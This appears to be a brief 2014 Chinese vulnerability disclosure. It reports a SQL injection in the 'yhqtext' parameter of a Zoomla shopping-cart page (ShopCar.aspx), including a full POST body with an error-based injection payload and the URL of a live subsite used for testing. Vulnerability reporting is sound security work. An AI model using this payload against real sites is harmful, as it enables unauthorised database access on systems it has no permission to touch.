### 简要描述:
RT
### 详细说明:
[<img src="https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg" alt="QQ图片20140511164417.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg)
官网的备份RAR下载中获得ShopCar.aspx文件,yhqtext参数过滤不严导致注入。
POST数据包.
```
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkzMDY3NjYwOGRk6%2FTSo2pywhEJXAcamziGHTiH1Mo%3D&yhqtext=1%27and%2B1%3D%28select%2B%40%40version%29--&yhqpwd=1&Button1=%E5%8E%BB%E6%94%B6%E9%93%B6%E5%8F%B0%E7%BB%93%E5%B8%90&project=&jifen=&ProClass=&projuct=&Stock=&GuestName=&comedate=&GuestMobile=&cityname=&preID=&Type=
```
### 漏洞证明:
以旗下分站测试:Url:http://sc.zoomla.cn/ShopCar.aspx
[<img src="https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg" alt="QQ图片20140511164604.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg)
很明显的报错啦,有防注入,很容易就绕过了。
暂无评论